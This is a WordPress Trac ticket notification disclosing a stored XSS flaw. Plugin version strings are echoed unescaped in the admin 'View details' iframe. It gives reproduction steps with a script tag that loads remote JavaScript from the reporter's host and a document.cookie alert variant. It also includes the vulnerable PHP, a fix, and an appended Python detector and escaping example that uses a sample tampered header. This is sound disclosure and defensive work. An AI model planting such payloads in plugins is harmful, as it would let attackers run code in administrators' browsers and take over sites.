[wp-trac] [WordPress Trac] #53020: Stored XSS via «View details» plugin iFrame

WordPress Trac noreply at wordpress.org
Fri May 7 13:35:34 UTC 2021


#53020: Stored XSS via «View details» plugin iFrame
--------------------------+-----------------------------
 Reporter:  m0ze          |       Owner:  (none)
     Type:  defect (bug)  |      Status:  new
 Priority:  normal        |   Milestone:  5.8
Component:  Security      |     Version:  trunk
 Severity:  normal        |  Resolution:
 Keywords:  has-patch     |     Focuses:  administration
--------------------------+-----------------------------
Description changed by SergeyBiryukov:

Old description:

> I found a way to use the XSS attack vector - through an iFrame with a
> detailed description of the plugin (plugin «View details» iFrame).
>
> === Possible operation options:
>
> * substitution or modification of the original plug-in to hide malicious
> code;
>
> * distribution of the modified plugin through third-party resources.
>

> === Steps To Reproduce:
>
> 0. open any existing plugin from the official WordPress repo, e.g. Hello
> Dolly.
> 1. change the version number to +1 (as a minimum) - from `Version: 1.7.2`
> to `Version: 1.7.3`.
> 2. add your payload right after the last digit - `Version: 1.7.3<script
> src="https://m0ze.ru/payload.a.js"></script>`
> 3. check the plugin info via dashboard, «View details» link.
>
> If you use the payload specifically as a `<script src=...></script>`,
> then visually, except for one digit in the plugin version, nothing will
> change. Other payloads also work
> (`<script>alert(document.cookie)</script>` etc.), but they add extra
> special characters on the right of the plugin version, which may alert
> the website administrator.
>

> === Screenshots:
>
> [[Image(https://i.imgur.com/7pz6UMh.png)]]
>
> [[Image(https://i.imgur.com/E7ejGkJ.png)]]
>
> [[Image(https://i.imgur.com/r2WQmFQ.png)]]
>

> === Code:
>
> **/wp-admin/includes/plugin-install.php, 881-884:**
>
> {{{#!php
> case 'newer_installed':
>         /* translators: %s: Plugin version. */
>         echo '<a class="button button-primary right disabled">' . sprintf( __( 'Newer Version (%s) Installed' ), $status['version'] ) . '</a>';
>         break;
> }}}
>

> === Quick fix:
>
> `strip_tags($status['version'])`
>

> === Video:
>
> **YouTube short demo:** https://youtu.be/_IRcQ82wovY
>

> === Impact
>
> Malicious JavaScript code injections, the ability to combine attack
> vectors against the targeted system, which can lead to a complete
> compromise of the resource.
>

> There is also an unknown number of plugins that display diagnostic
> information about the site, including the names and versions of plugins,
> where this vulnerability will also be triggered, e.g.: Asset CleanUp:
> Page Speed Booster, WP Cerber Security, Anti-spam & Malware Scan and many
> other plugins.

New description:

 I found a way to use the XSS attack vector - through an iFrame with a
 detailed description of the plugin (plugin «View details» iFrame).

 === Possible operation options:

 * substitution or modification of the original plug-in to hide malicious
 code;

 * distribution of the modified plugin through third-party resources.


 === Steps To Reproduce:

 0. open any existing plugin from the official WordPress repo, e.g. Hello
 Dolly.
 1. change the version number to +1 (as a minimum) - from `Version: 1.7.2`
 to `Version: 1.7.3`.
 2. add your payload right after the last digit - `Version: 1.7.3<script
 src="https://m0ze.ru/payload.a.js"></script>`
 3. check the plugin info via dashboard, «View details» link.

 If you use the payload specifically as a `<script src=...></script>`, then
 visually, except for one digit in the plugin version, nothing will change.
 Other payloads also work (`<script>alert(document.cookie)</script>` etc.),
 but they add extra special characters on the right of the plugin version,
 which may alert the website administrator.


 === Screenshots:

 https://i.imgur.com/7pz6UMh.png

 https://i.imgur.com/E7ejGkJ.png

 https://i.imgur.com/r2WQmFQ.png


 === Code:

 **/wp-admin/includes/plugin-install.php, 881-884:**

 {{{#!php
 case 'newer_installed':
         /* translators: %s: Plugin version. */
         echo '<a class="button button-primary right disabled">' . sprintf( __( 'Newer Version (%s) Installed' ), $status['version'] ) . '</a>';
         break;
 }}}


 === Quick fix:

 `strip_tags($status['version'])`


 === Video:

 **YouTube short demo:** https://youtu.be/_IRcQ82wovY


 === Impact

 Malicious JavaScript code injections, the ability to combine attack
 vectors against the targeted system, which can lead to a complete
 compromise of the resource.


 There is also an unknown number of plugins that display diagnostic
 information about the site, including the names and versions of plugins,
 where this vulnerability will also be triggered, e.g.: Asset CleanUp: Page
 Speed Booster, WP Cerber Security, Anti-spam & Malware Scan and many other
 plugins.

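As an added example that is not part of this ticket and not WordPress core code: the script below reads the `Version:` plugin header the way a loose header reader would (an assumed approximation of WordPress's reader, not its implementation), flags a value that falls outside a strict version allow-list, and shows the output-side fix of escaping the value before it is interpolated into the admin page markup. `html.escape` stands in for WordPress's `esc_html()`; both plugin headers are constructed samples.

```python
import html
import re
from typing import Optional

# Constructed sample plugin headers (not real plugin files).
CLEAN_HEADER = """<?php
/*
Plugin Name: Hello Dolly
Version: 1.7.2
*/
"""

TAMPERED_HEADER = """<?php
/*
Plugin Name: Hello Dolly
Version: 1.7.3<script src="https://example.invalid/payload.js"></script>
*/
"""

# Loose read, approximating a plugin header reader (assumption, not WP code):
# everything after "Version:" to end of line, whatever characters it holds.
_VERSION_LINE = re.compile(r"^[ \t*#]*Version:\s*(.+?)\s*$", re.M | re.I)
# Strict allow-list for what a plugin version string may contain.
_STRICT_VERSION = re.compile(r"[0-9A-Za-z][0-9A-Za-z.+_-]{0,63}")


def read_version(header: str) -> Optional[str]:
    """Return the raw Version header value, or None if absent."""
    m = _VERSION_LINE.search(header)
    return m.group(1) if m else None


def is_well_formed_version(version: str) -> bool:
    """True only if the value is purely version-like (no markup possible)."""
    return _STRICT_VERSION.fullmatch(version) is not None


def render_newer_installed(version: str) -> str:
    """Output-side fix: escape before interpolating into admin HTML."""
    safe = html.escape(version, quote=True)  # stands in for esc_html()
    return ('<a class="button button-primary right disabled">'
            "Newer Version (%s) Installed</a>" % safe)


def audit_header(header: str) -> dict:
    """Detection view: report the version and whether it looks tampered."""
    version = read_version(header)
    suspicious = version is not None and not is_well_formed_version(version)
    return {"version": version, "suspicious": suspicious,
            "rendered": render_newer_installed(version or "")}
```

The strict allow-list is the detection side (a header that fails it is worth a look regardless of how it renders); the escape is the fix that holds even when the allow-list is not applied.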
-- 
Ticket URL: <https://core.trac.wordpress.org/ticket/53020#comment:6>
WordPress Trac <https://core.trac.wordpress.org/>